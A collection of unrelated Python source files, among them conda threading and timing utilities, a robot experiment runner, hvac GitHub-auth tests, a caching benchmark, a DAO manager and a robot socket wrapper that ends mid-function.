self.pbar.close()
# use this for debugging, because ProcessPoolExecutor isn't pdb/ipdb friendly
class DummyExecutor(Executor):
def __init__(self):
self._shutdown = False
self._shutdownLock = Lock()
def submit(self, fn, *args, **kwargs):
with self._shutdownLock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = Future()
try:
result = fn(*args, **kwargs)
except BaseException as e:
f.set_exception(e)
else:
f.set_result(result)
return f
def shutdown(self, wait=True):
with self._shutdownLock:
self._shutdown = True
class ThreadLimitedThreadPoolExecutor(ThreadPoolExecutor):
def __init__(self, max_workers=10):
super(ThreadLimitedThreadPoolExecutor, self).__init__(max_workers)
def submit(self, fn, *args, **kwargs):
"""
This is an exact reimplementation of the `submit()` method on the parent class, except
with an added `try/except` around `self._adjust_thread_count()`. So long as there is at
least one living thread, this thread pool will not throw an exception if threads cannot
be expanded to `max_workers`.
In the implementation, we use "protected" attributes from concurrent.futures (`_base`
and `_WorkItem`). Consider vendoring the whole concurrent.futures library
as an alternative to these protected imports.
https://github.com/agronholm/pythonfutures/blob/3.2.0/concurrent/futures/thread.py#L121-L131 # NOQA
https://github.com/python/cpython/blob/v3.6.4/Lib/concurrent/futures/thread.py#L114-L124
"""
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = _base.Future()
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
try:
self._adjust_thread_count()
except RuntimeError:
# RuntimeError: can't start new thread
# See https://github.com/conda/conda/issues/6624
if len(self._threads) > 0:
# It's ok to not be able to start new threads if we already have at least
# one thread alive.
pass
else:
raise
return f
as_completed = as_completed
def get_instrumentation_record_file():
default_record_file = join('~', '.conda', 'instrumentation-record.csv')
return expand(os.environ.get("CONDA_INSTRUMENTATION_RECORD_FILE", default_record_file))
class time_recorder(ContextDecorator): # pragma: no cover
record_file = get_instrumentation_record_file()
start_time = None
total_call_num = defaultdict(int)
total_run_time = defaultdict(float)
def __init__(self, entry_name=None, module_name=None):
self.entry_name = entry_name
self.module_name = module_name
def _set_entry_name(self, f):
if self.entry_name is None:
if hasattr(f, '__qualname__'):
entry_name = f.__qualname__
else:
entry_name = ':' + f.__name__
if self.module_name:
entry_name = '.'.join((self.module_name, entry_name))
self.entry_name = entry_name
def __call__(self, f):
self._set_entry_name(f)
return super(time_recorder, self).__call__(f)
def __enter__(self):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if enabled and boolify(enabled):
self.start_time = time()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.start_time:
entry_name = self.entry_name
end_time = time()
run_time = end_time - self.start_time
self.total_call_num[entry_name] += 1
self.total_run_time[entry_name] += run_time
self._ensure_dir()
with open(self.record_file, 'a') as fh:
fh.write("%s,%f\n" % (entry_name, run_time))
# total_call_num = self.total_call_num[entry_name]
# total_run_time = self.total_run_time[entry_name]
# log.debug('%s %9.3f %9.3f %d', entry_name, run_time, total_run_time, total_call_num)
@classmethod
def log_totals(cls):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if not (enabled and boolify(enabled)):
return
log.info('=== time_recorder total time and calls ===')
for entry_name in sorted(cls.total_run_time.keys()):
log.info(
'TOTAL %9.3f % 9d %s',
cls.total_run_time[entry_name],
cls.total_call_num[entry_name],
entry_name,
)
@memoizemethod
def _ensure_dir(self):
if not isdir(dirname(self.record_file)):
os.makedirs(dirname(self.record_file))
def print_instrumentation_data(): # pragma: no cover
record_file = get_instrumentation_record_file()
grouped_data = defaultdict(list)
final_data = {}
if not isfile(record_file):
return
with open(record_file) as fh:
for line in fh:
entry_name, total_time = line.strip().split(',')
grouped_data[entry_name].append(float(total_time))
for entry_name in sorted(grouped_data):
all_times = grouped_data[entry_name]
counts = len(all_times)
total_time = sum(all_times)
average_time = total_time / counts
final_data[entry_name] = {
'counts': counts,
'total_time': total_time,
'average_time': average_time,
}
print(json.dumps(final_data, sort_keys=True, indent=2, separators=(',', ': ')))
if __name__ == "__main__":
print_instrumentation_data()
|
run_expr.py | #!/usr/bin/env python
import argparse
import datetime as dt
import os
import shutil
import threading
import subprocess32 as subprocess
import time
# Timeout in seconds to run the simulation
RUN_TIMEOUT = 60
class Trial:
def __init__(self, tname, desc_path, params_file):
self.tname = tname
self.descpath = desc_path
self.params_file = params_file
def __repr__(self):
return self.tname
def assert_exists(path, isfile=False, isdir=False, msg=None):
if os.path.exists(path):
if isdir and not os.path.isdir(path):
if msg is None:
print path + ' must be a directory'
else:
print msg + ': ' + path
exit(1)
if isfile and not os.path.isfile(path):
if msg is None:
print path + ' must be a file'
else:
print msg + ': ' + path
exit(1)
else:
if msg is None:
print path + ' doesn\'t exist'
else:
print msg + ': ' + path
exit(1)
def get_experiment_trajectories(expr_dir, params_file):
traj_data = {}
traj_files = [d for d in os.listdir(expr_dir) if os.path.splitext(d)[1] == ".pickle"]
for traj in traj_files:
path = os.path.join(expr_dir, traj)
tname = os.path.splitext(traj)[0]
traj_data[tname] = Trial(tname, path, params_file)
return traj_data
def cleanup(proc):
try:
ret = proc.wait() # timeout=600)
except subprocess.TimeoutExpired:
print "Timed out"
proc.kill()
ret = proc.wait(timeout=3)
print "--- exit: {}".format(ret)
def run_one(trial_dir, n, trial):
simtimeout = 20.0
trial_dir = os.path.join(trial_dir, str(n))
try:
os.makedirs(trial_dir)
except OSError:
print 'Error making trial dir'
return
def tfile(x):
return os.path.join(trial_dir, x)
print "== Trial: {}, N: {}".format(trial_dir, n)
# start rosbag
proc = subprocess.Popen(['python', 'src/run_once.py',
trial.descpath,
tfile("out.pickle"),
trial.params_file,
"--sim_timeout", str(simtimeout)])
time.sleep(2.0)
cleanup(proc)
def ensurethreads(threads, max_threads):
while len(threads) > max_threads:
for i in range(len(threads)):
if not threads[i].is_alive():
threads[i].join()
del threads[i]
return
def run_experiments(nthreads, expr_dir, expr_name, params_file, out_dir):
trajs = get_experiment_trajectories(expr_dir, params_file)
ntrial = 10
total = ntrial * len(trajs.items())
j = 0
shutil.copytree(expr_dir, out_dir)
shutil.copyfile(params_file, out_dir + "/params.yaml")
threads = []
tlock = threading.Lock()
for trajname, traj in trajs.items():
exp_dir = os.path.join(out_dir, trajname)
os.makedirs(exp_dir)
trial_dir = os.path.join(exp_dir, trajname)
os.makedirs(trial_dir)
trial_dir = os.path.join(exp_dir, trajname)
for i in range(ntrial):
with tlock:
ensurethreads(threads, nthreads)
t = threading.Thread(target=run_one, args=(trial_dir, i, traj))
t.start()
threads.append(t)
time.sleep(0.5)
j += 1
print "Trial %d of %d" % (j, total)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Runs a test suite for mushr_rhc')
parser.add_argument('expr_dir',
help='Directory to read and run experiments from')
parser.add_argument('out_dir',
help='Directory to output expermiment data to')
parser.add_argument('params_file',
help='Parameter file for the RHC')
parser.add_argument('--expr-name',
nargs='+',
default='all',
help='Experiment to run')
parser.add_argument('--real',
action='store_true',
help='Run experiments in real')
parser.add_argument('--prompt-comments',
action='store_true',
help='Prompt for comment on the run after every run')
args, _ = parser.parse_known_args()
# Ignore ros specific parameters
args.expr_name = list(filter(lambda x: '__' not in x, args.expr_name))
assert_exists(args.expr_dir, isdir=True)
if os.path.exists(args.out_dir):
t = str(dt.datetime.now()).replace(' ', '-')
print args.out_dir, args.out_dir + '-' + t
os.rename(args.out_dir, args.out_dir + '-' + t)
run_experiments(1, args.expr_dir, args.expr_name, args.params_file, args.out_dir)
|
client_demo.py | import socket
import struct
import threading
import queue
import time
class ThreadedClient(threading.Thread):
def __init__(self, host, port):
threading.Thread.__init__(self)
#set up queues
self.send_q = queue.Queue(maxsize = 10)
#declare instance variables
self.host = host
self.port = port
#connect to socket
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((self.host, self.port))
self.s.settimeout(.1)
#LISTEN
def listen(self):
while True: #loop forever
try:
print('checking for message...')
# stops listening if there's a message to send
if self.send_q.empty() == False:
self.send_message()
else:
print('no message')
print('listening...')
message = self.s.recv(4096).decode()
print('RECEIVED: ' + message)
except socket.timeout:
pass
def start_listen(self):
t = threading.Thread(target = self.listen)
t.start()
#t.join()
print('started listen')
#ADD MESSAGE
def add_message(self, msg):
#put message into the send queue
self.send_q.put(msg)
print('ADDED MSG: ' + msg)
#self.send_message()
#SEND MESSAGE
def send_message(self):
#send message
msg = self.get_send_q()
if msg == "empty!":
print("nothing to send")
else:
self.s.sendall(msg.encode())
print('SENDING: ' + msg)
#restart the listening
#self.start_listen()
#SAFE QUEUE READING
#if nothing in q, prints "empty" instead of stalling program
def get_send_q(self):
if self.send_q.empty():
print("empty!")
return "empty!"
else:
msg = self.send_q.get()
return msg
if __name__ == '__main__':
port = 8001
address = 'localhost'
s = ThreadedClient(address, port)
s.start()
print(('Server started, port: ', port))
s.add_message('hello world')
s.start_listen()
s.add_message('hello world') |
test_github.py | from threading import Thread
from unittest import TestCase
from parameterized import parameterized
from hvac import exceptions
from hvac.tests import utils
try:
# Python 2.7
from http.server import HTTPServer
except ImportError:
# Python 3.x
from BaseHTTPServer import HTTPServer
class TestGithub(utils.HvacIntegrationTestCase, TestCase):
TEST_GITHUB_PATH = 'test-github'
@classmethod
def setUpClass(cls):
super(TestGithub, cls).setUpClass()
# Configure mock server.
cls.mock_server_port = utils.get_free_port()
cls.mock_server = HTTPServer(('localhost', cls.mock_server_port), utils.MockGithubRequestHandler)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
cls.mock_server_thread = Thread(target=cls.mock_server.serve_forever)
cls.mock_server_thread.setDaemon(True)
cls.mock_server_thread.start()
def setUp(self):
super(TestGithub, self).setUp()
self.client.sys.enable_auth_method(
method_type='github',
path=self.TEST_GITHUB_PATH,
)
def tearDown(self):
super(TestGithub, self).tearDown()
self.client.sys.disable_auth_method(
path=self.TEST_GITHUB_PATH,
)
@parameterized.expand([
("just organization", 204, 'some-test-org', '', 0, 0, TEST_GITHUB_PATH),
])
def test_configure(self, test_label, expected_status_code, organization, base_url, ttl, max_ttl, mount_point):
response = self.client.auth.github.configure(
organization=organization,
base_url=base_url,
ttl=ttl,
max_ttl=max_ttl,
mount_point=mount_point,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
def test_read_configuration(self):
response = self.client.auth.github.read_configuration(
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member='data',
container=response,
)
@parameterized.expand([
("just organization", 'some-test-org', '', '', ''),
("different base url", 'some-test-org', 'https://cathub.example', '', ''),
("custom ttl seconds", 'some-test-org', '', '500s', ''),
("custom ttl minutes", 'some-test-org', '', '500m', ''),
("custom ttl hours", 'some-test-org', '', '500h', ''),
("custom max ttl", 'some-test-org', '', '', '500s'),
])
def test_configure_and_read_configuration(self, test_label, organization, base_url, ttl, max_ttl):
config_response = self.client.auth.github.configure(
organization=organization,
base_url=base_url,
ttl=ttl,
max_ttl=max_ttl,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=204,
second=config_response.status_code
)
read_config_response = self.client.auth.github.read_configuration(
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=organization,
second=read_config_response['data']['organization']
)
self.assertEqual(
first=base_url,
second=read_config_response['data']['base_url']
)
self.assertEqual(
first=self.convert_python_ttl_value_to_expected_vault_response(ttl_value=ttl),
second=read_config_response['data']['ttl']
)
self.assertEqual(
first=self.convert_python_ttl_value_to_expected_vault_response(ttl_value=max_ttl),
second=read_config_response['data']['max_ttl']
)
@parameterized.expand([
("no policies", 204, 'hvac', None),
("with policies", 204, 'hvac', ['default']),
])
def test_map_team(self, test_label, expected_status_code, team_name, policies):
response = self.client.auth.github.map_team(
team_name=team_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
def test_read_team_mapping(self):
response = self.client.auth.github.read_team_mapping(
team_name='hvac',
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member='data',
container=response,
)
@parameterized.expand([
("no policies", 204, 'hvac', None),
("with policy", 204, 'hvac', ['default']),
("with policy incorrect type", 204, 'hvac', 'default, root', exceptions.ParamValidationError, "unsupported policies argument provided"),
("with policies", 204, 'hvac', ['default', 'root']),
])
def test_map_team_and_read_mapping(self, test_label, expected_status_code, team_name, policies, raises=False, exception_msg=''):
if raises:
with self.assertRaises(raises) as cm:
self.client.auth.github.map_team(
team_name=team_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member=exception_msg,
container=str(cm.exception),
)
else:
response = self.client.auth.github.map_team(
team_name=team_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
response = self.client.auth.github.read_team_mapping(
team_name=team_name,
mount_point=self.TEST_GITHUB_PATH,
)
if policies is None:
expected_policies = ''
else:
expected_policies = ','.join(policies)
self.assertDictEqual(
d1=dict(key=team_name, value=expected_policies),
d2=response['data'],
)
@parameterized.expand([
("no policies", 204, 'hvac-user', None),
("with policies", 204, 'hvac-user', ['default']),
])
def teat_map_user(self, test_label, expected_status_code, user_name, policies):
response = self.client.auth.github.map_user(
user_name=user_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
def test_read_user_mapping(self):
response = self.client.auth.github.read_user_mapping(
user_name='hvac',
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member='data',
container=response,
)
@parameterized.expand([
("no policies", 204, 'hvac', None),
("with policy", 204, 'hvac', ['default']),
("with policy incorrect type", 204, 'hvac', 'default, root', exceptions.ParamValidationError, "unsupported policies argument provided"),
("with policies", 204, 'hvac', ['default', 'root']),
])
def test_map_user_and_read_mapping(self, test_label, expected_status_code, user_name, policies, raises=False, exception_msg=''):
if raises:
with self.assertRaises(raises) as cm:
self.client.auth.github.map_user(
user_name=user_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member=exception_msg,
container=str(cm.exception),
)
else:
response = self.client.auth.github.map_user(
user_name=user_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
response = self.client.auth.github.read_user_mapping(
user_name=user_name,
mount_point=self.TEST_GITHUB_PATH,
)
if policies is None:
expected_policies = ''
else:
expected_policies = ','.join(policies)
self.assertDictEqual(
d1=dict(key=user_name, value=expected_policies),
d2=response['data'],
)
@parameterized.expand([
("valid token", 'valid-token', None, None),
("invalid token not in org", "invalid-token", exceptions.InvalidRequest, 'user is not part of required org'),
])
def test_login(self, test_label, test_token, exceptions_raised, exception_msg):
self.client.auth.github.configure(
organization='hvac',
base_url='http://localhost:{port}/'.format(port=self.mock_server_port),
mount_point=self.TEST_GITHUB_PATH,
)
if exceptions_raised is None:
self.client.auth.github.login(
token=test_token,
mount_point=self.TEST_GITHUB_PATH,
)
else:
with self.assertRaises(exceptions_raised) as cm:
self.client.auth.github.login(
token=test_token,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member=exception_msg,
container=str(cm.exception)
)
|
benchmark.py | # SPDX-FileCopyrightText: 2015 Eric Larson
#
# SPDX-License-Identifier: Apache-2.0
import sys
import requests
import argparse
from multiprocessing import Process
from datetime import datetime
from wsgiref.simple_server import make_server
from cachecontrol import CacheControl
HOST = "localhost"
PORT = 8050
URL = "http://{}:{}/".format(HOST, PORT)
class Server(object):
def __call__(self, env, sr):
body = "Hello World!"
status = "200 OK"
headers = [
("Cache-Control", "max-age=%i" % (60 * 10)), ("Content-Type", "text/plain")
]
sr(status, headers)
return body
def start_server():
httpd = make_server(HOST, PORT, Server())
httpd.serve_forever()
def run_benchmark(sess):
proc = Process(target=start_server)
proc.start()
start = datetime.now()
for i in range(0, 1000):
sess.get(URL)
sys.stdout.write(".")
end = datetime.now()
print()
total = end - start
print("Total time for 1000 requests: %s" % total)
proc.terminate()
def run():
parser = argparse.ArgumentParser()
parser.add_argument(
"-n",
"--no-cache",
default=False,
action="store_true",
help="Do not use cachecontrol",
)
args = parser.parse_args()
sess = requests.Session()
if not args.no_cache:
sess = CacheControl(sess)
run_benchmark(sess)
if __name__ == "__main__":
run()
|
daomanager.py | """
Data Access Object Manager.
The DAO manager coordinates the DAOs from each one of the necessary sources to
generate the dataframe usef by the classifiers to calculate a prediction score.
"""
from typing import Generator
import pandas as pd
import geniepy.datamgmt.daos as daos
from multiprocessing import Process
import geniepy.config as config
import geniepy.datamgmt.tables as gt
import geniepy.datamgmt.repositories as dr
class DaoManager:
"""
Implementation of Data Access Object Manager.
The DAO manager is intended to utilize different DAOs to generate
dataframe records used by the classifiers.
At start of day the download method should be called to scrape data from online
sources on each DAO and generate appropriate tables.
The DAO manager should then be called to generate the records that can be fed into
the classifiers.
"""
__slots__ = [
"_sjr_dao",
"_pubtator_disease_dao",
"_pubtator_gene_dao",
"_pubmed_dao",
"_features",
"_scores",
]
def create_repos(self):
"""Configure and create scoring repositories."""
credentials = config.get_credentials()
projname = config.get_projname()
dataset = config.get_dataset("scoring")
features_repo = dr.GbqRepository(
projname, gt.FEATURES_PROPTY, dataset, credentials
)
scores_repo = dr.GbqRepository(projname, gt.SCORES_PROPTY, dataset, credentials)
return features_repo, scores_repo
# pylint: disable=bad-continuation
def __init__(
self,
sjr_dao: daos.SjrDao,
pubtator_disease_dao: daos.PubtatorDiseaseParser,
pubtator_gene_dao: daos.PubtatorGeneParser,
pubmed_dao: daos.PubMedDao,
):
"""Initializa DAO mgr with corresponding DAO children."""
self._sjr_dao = sjr_dao
self._pubtator_disease_dao = pubtator_disease_dao
self._pubtator_gene_dao = pubtator_gene_dao
self._pubmed_dao = pubmed_dao
self._features, self._scores = self.create_repos()
def download(self, chunksize: int, **kwargs):
"""Download (scrapes) data for DAOs and creates internal tables."""
# Fire off scrapers async
psjr = Process(target=self._sjr_dao.download, args=(chunksize,), kwargs=kwargs)
ppubtatordisease = Process(
target=self._pubtator_disease_dao.download, args=(chunksize,), kwargs=kwargs
)
ppubtatorgene = Process(
target=self._pubtator_gene_dao.download, args=(chunksize,), kwargs=kwargs
)
ppubmed = Process(
target=self._pubmed_dao.download, args=(chunksize,), kwargs=kwargs
)
psjr.start()
ppubtatordisease.start()
ppubtatorgene.start()
ppubmed.start()
def _get_pubmeds_df(self, pmids: str):
"""
Get pubmed dao dataframes.
Arguments:
pubmeds {str} -- pipe delimtied string with pmids
chunksize {int} -- limits max chunksize internally to limit memory usage
Returns: Dataframe with pubmed dao dataframe.
"""
pmids = pmids.split("|")
pubmed_df = pd.DataFrame()
for pmid in pmids:
try:
pmid_query = self._pubmed_dao.query_pkey(int(pmid))
# Only care about 1 pmid entry (table shouldn't have duplicates)
pmid_df = next(self._pubmed_dao.query(pmid_query, 1))
pubmed_df = pubmed_df.append(pmid_df, ignore_index=True)
except StopIteration: # pragma: no cover
# TODO log instead of print
print(f"PMID: {pmid} not found!")
return pubmed_df
def get_max_feature(self, chunksize):
"""Retrieve the max addressable record in features table."""
count_query = self._features.query_all.replace("*", "MAX(random_num)")
max_df = next(self._features.query(count_query, 1, exact=True))
# Make sure go past max to include all numbers in range
return int(max_df.iloc[0][0]) + chunksize
def get_features(self, offset: int, chunksize: int) -> pd.DataFrame:
"""
Generate the dataframe records for classifiers.
This function should be called after the DAO tables have been created through
the download function.
Arguments:
offset {int} -- The offset of records to be fetched
chunksize {int} -- The number of records to be returned
Returns:
A dataframe containing records from features table
"""
gen_query = (
lambda offset: self._features.query_all
+ f" WHERE random_num BETWEEN {offset} AND {offset + chunksize};"
)
query_str = gen_query(offset)
print(query_str)
record_df = next(self._features.query(query_str, chunksize, exact=True))
return record_df
def save_predictions(self, predictions: pd.DataFrame):
"""
Save computed predictions and supporting data into output tables.
Arguments:
records {DataFrame} -- [description]
"""
self._scores.save(predictions)
|
rm_socket.py | import traceback
import errno
import queue
import rm_log
import select
import socket
import subprocess
import threading
logger = rm_log.dji_scratch_logger_get()
class RmSocket(object):
TCP_MODE = 'tcp'
UDP_MODE = 'udp'
def __init__(self):
self.user_fd_to_socket_fd = {}
self.socket_fileno_info = {}
# self.recv_msg_queue = queue.Queue(128)
self.send_msg_queue = queue.Queue(128)
self.user_fd = 0
self.epoll_obj = select.epoll()
self.recv_thread_finish = True
self.recv_thread = None
def init(self):
logger.info('SOCKET INIT')
self.recv_thread = threading.Thread(target=self.__epoll_task)
self.recv_thread_finish = False
self.recv_thread.start()
def exit(self):
logger.info('RM SOCKET EXIT')
self.recv_thread_finish = True
for socket_fileno in self.socket_fileno_info.keys():
self.socket_fileno_info[socket_fileno]['socket'].close()
self.socket_fileno_info = {}
self.user_fd_to_socket_fd = {}
self.recv_thread.join()
def close(self, user_fd):
logger.info('SHUWDOWN %d' % (user_fd))
if user_fd in self.user_fd_to_socket_fd.keys():
self.__remove_socket_fileno_info(self.user_fd_to_socket_fd[user_fd])
def create(self, mode, ip_port, server=True, recv_msgq_size=16, send_msgq_size=16, **callback):
if mode == RmSocket.TCP_MODE:
if server:
return self.__create_tcp_server(ip_port, recv_msgq_size=recv_msgq_size, send_msgq_size=send_msgq_size,
**callback)
else:
return self.__create_tcp_client(ip_port, recv_msgq_size=recv_msgq_size, send_msgq_size=send_msgq_size,
**callback)
elif mode == RmSocket.UDP_MODE:
if server:
return self.__create_udp_server(ip_port, recv_msgq_size=recv_msgq_size, send_msgq_size=send_msgq_size,
**callback)
else:
return self.__create_udp_client(ip_port, recv_msgq_size=recv_msgq_size, send_msgq_size=send_msgq_size,
**callback)
else:
return None
# send msg directly until send_buff overflow, and put the msg to msgq
# return value same as read on success
# return None on error
def send(self, user_fd, msg, ip_port=None):
try:
msg = str(msg)
if user_fd in self.user_fd_to_socket_fd.keys():
fileno = self.user_fd_to_socket_fd[user_fd]
attr = self.socket_fileno_info[fileno]
if attr['type'] == self.TCP_MODE and attr['server_flag'] != True:
return attr['socket'].send(msg.encode('utf-8'))
elif attr['type'] == self.UDP_MODE:
if ip_port:
return attr['socket'].sendto(msg.encode('utf-8'), ip_port)
elif 'default_target_addr' in attr.keys() and attr['default_target_addr']:
ip_port = attr['default_target_addr']
return attr['socket'].sendto(msg.encode('utf-8'), ip_port)
else:
logger.error('no target ip and port, cur msg is %s' % (msg.encode('utf-8')))
return None
except socket.error as e:
if e.errno == errno.EAGAIN:
if not attr['send_msgq'].full():
attr['send_msgq'].put((msg, ip_port))
else:
logger.fatal(traceback.format_exc())
except Exception as e:
logger.fatal(traceback.format_exc())
# get msg data from msg_queue
# the msg recv from socket will be putted into msg_queue if there is no recv_callback
def recv(self, user_fd):
if user_fd in self.user_fd_to_socket_fd.keys():
fileno = self.user_fd_to_socket_fd[user_fd]
msg_queue = self.socket_fileno_info[fileno]['recv_msgq']
if not msg_queue.empty():
msg = msg_queue.get()
return msg
else:
return None
def get_status(self):
pass
def get_local_host_ip(self, user_fd=None):
if user_fd in self.user_fd_to_socket_fd.keys():
socket = self.socket_fileno_info[self.user_fd_to_socket_fd[user_fd]]['socket']
try:
return socket.getsockname()[0]
except Exception as e:
logger.error(traceback.format_exc())
return None
else:
ifconfig_pipe = subprocess.Popen(['busybox', 'ifconfig', 'wlan0'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
ifconfig_info, error = ifconfig_pipe.communicate()
ifconfig_pipe.kill()
if len(error) != 0:
# get wlan0 error
return None
ifconfig_info = ifconfig_info.decode('utf-8')
inet_addr_str = ifconfig_info.split('\n')[1]
local_host_ip = None
if 'inet addr' in inet_addr_str:
local_host_ip = inet_addr_str.split(':')[1].split(' ')[0]
return local_host_ip
def get_remote_host_ip(self, user_fd):
if user_fd in self.user_fd_to_socket_fd.keys():
socket = self.socket_fileno_info[self.user_fd_to_socket_fd[user_fd]]['socket']
try:
return socket.getpeername()[0]
except Exception as e:
logger.error(traceback.format_exc())
else:
return None
def set_udp_default_target_addr(self, user_fd, ip_port):
if user_fd in self.user_fd_to_socket_fd.keys():
fileno = self.user_fd_to_socket_fd[user_fd]
if ip_port[0] == '<broadcast>':
self.socket_fileno_info[fileno]['socket'].setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.socket_fileno_info[fileno]['socket'].setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket_fileno_info[fileno]['default_target_addr'] = ip_port
def update_socket_info(self, user_fd, recv_msgq_size=None, send_msgq_size=None, connected_callback=None,
disconnected_callback=None, recv_callback=None, send_callback=None):
if user_fd in self.user_fd_to_socket_fd.keys():
fileno = self.user_fd_to_socket_fd[user_fd]
if recv_msgq_size:
self.socket_fileno_info[fileno]['recv_msgq'] = queue.Queue(recv_msgq_size)
if send_msgq_size:
self.socket_fileno_info[fileno]['send_msgq'] = queue.Queue(send_msgq_size)
if connected_callback and callable(connecti_calback):
self.socket_fileno_info[fileno]['callback']['connected_callback'] = connected_callback
if disconnected_callback and callable(disconnected_calback):
self.socket_fileno_info[fileno]['callback']['disconnected_callback'] = disconnected_callback
if recv_callback and callable(recv_callback):
self.socket_fileno_info[fileno]['callback']['recv_callback'] = recv_callback
if send_callback and callable(send_callback):
self.socket_fileno_info[fileno]['callback']['send_callback'] = send_callback
def __add_socket_fileno_info(self, fd, type, server=False, recv_msgq_size=1, send_msgq_size=1, **callback):
# update fd
self.user_fd += 1
fd_t = self.user_fd
# maping custom fd and real fd
self.user_fd_to_socket_fd[self.user_fd] = fd.fileno()
fd.setblocking(False)
self.epoll_obj.register(fd.fileno(), select.EPOLLIN | select.EPOLLET)
self.socket_fileno_info[fd.fileno()] = {
'socket': fd,
'user_fd': self.user_fd,
'type': type,
'server_flag': server,
'callback': None,
'recv_msgq': queue.Queue(recv_msgq_size),
'send_msgq': queue.Queue(send_msgq_size)
}
callback_dict = {}
if 'connected_callback' in callback.keys() and callable(callback['connected_callback']):
callback_dict['connected_callback'] = callback['connected_callback']
if 'disconnected_callback' in callback.keys() and callable(callback['disconnected_callback']):
callback_dict['disconnected_callback'] = callback['disconnected_callback']
if 'recv_callback' in callback.keys() and callable(callback['recv_callback']):
callback_dict['recv_callback'] = callback['recv_callback']
if 'send_callback' in callback.keys() and callable(callback['send_callback']):
callback_dict['send_callback'] = callback['send_callback']
self.socket_fileno_info[fd.fileno()]['callback'] = callback_dict
logger.info('NEW SOCKET %s' % fd)
return fd_t
def __remove_socket_fileno_info(self, fileno):
if fileno in self.socket_fileno_info.keys():
socket = self.socket_fileno_info[fileno]['socket']
socket.close()
if self.socket_fileno_info[fileno]['user_fd'] in self.user_fd_to_socket_fd.keys():
self.user_fd_to_socket_fd.pop(self.socket_fileno_info[fileno]['user_fd'])
self.socket_fileno_info.pop(fileno)
def __create_tcp_server(self, ip_port, recv_msgq_size, send_msgq_size, **callback):
try:
fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd.bind(ip_port)
fd_t = self.__add_socket_fileno_info(fd, self.TCP_MODE, server=True, recv_msgq_size=recv_msgq_size,
send_msgq_size=send_msgq_size, **callback)
fd.listen()
return fd_t
except Exception as e:
logger.fatal(traceback.format_exc())
return None
def __create_tcp_client(self, ip_port, recv_msgq_size, send_msgq_size, **callback):
try:
fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd.bind(ip_port)
fd_t = self.__add_socket_fileno_info(fd, self.TCP_MODE, server=False, recv_msgq_size=recv_msgq_size,
send_msgq_size=send_msgq_size, **callback)
fd.connect()
return fd_t
except Exception as e:
logger.fatal(traceback.format_exc())
return None
def __create_udp_server(self, ip_port, recv_msgq_size, send_msgq_size, **callback):
try:
fd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
fd.bind(ip_port)
fd_t = self.__add_socket_fileno_info(fd, self.UDP_MODE, server=True, recv_msgq_size=recv_msgq_size,
send_msgq_size=send_msgq_size, **callback)
return fd_t
except Exception as e:
logger.fatal(traceback.format_exc())
return fd
def __create_udp_client(self, ip_port, recv_msgq_size, send_msgq_size, **callback):
try:
fd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
fd_t = self.__add_socket_fileno_info(fd, self.UDP_MODE, server=False, recv_msgq_size=recv_msgq_size,
send_msgq_size=send_msgq_size, **callback)
return fd_t
except Exception as e:
logger.fatal(traceback.format_exc())
return fd
def __register_connected_cb(self):
pass
def __register_disconnected_cb(self):
pass
def __register_recv_cb(self):
pass
def __register_send_cb(self):
pass
def __epoll_task(self):
timeout = -1
while not self.recv_thread_finish:
events = self.epoll_obj.poll(timeout)
if not events:
continue
for fd_fileno, event in events:
cur_socket_info = self.socket_fileno_info[fd_fileno]
# tcp
if cur_socket_info['type'] == self.TCP_MODE:
# check if new connection or not
if cur_socket_info['server_flag'] == True:
# ET mode, loop accept until raise exception
while True:
try:
conn, addr = cur_socket_info['socket'].accept()
fd_t = self.__add_socket_fileno_info(conn, self.TCP_MODE, server=False,
**self.socket_fileno_info[fd_fileno]['callback'])
if 'connected_callback' in self.socket_fileno_info[fd_fileno]['callback'].keys():
# connected callback (conn_addr, new_user_fd)
self.socket_fileno_info[fd_fileno]['callback']['connected_callback'](
self.socket_fileno_info[fd_fileno]['user_fd'], fd_t)
logger.info('NEW CONNECTION %s %s' % (conn, addr))
except socket.error as e:
if e.errno == errno.EAGAIN:
logger.info("NO NEW CONNECTION ALSO")
else:
logger.fatal(traceback.format_exc())
break
except Exception as e:
logger.fatal(traceback.format_exc())
break
else:
if event & select.EPOLLHUP:
if 'disconnected_callback' in self.socket_fileno_info[fd_fileno]['callback'].keys():
self.socket_fileno_info[fd_fileno]['callback']['disconnected_callback'](
self.socket_fileno_info[fd_fileno]['user_fd'])
self.__remove_socket_fileno_info(fd_fileno)
self.epoll_obj.unregister(fd_fileno)
# Read available
elif event & select.EPOLLIN:
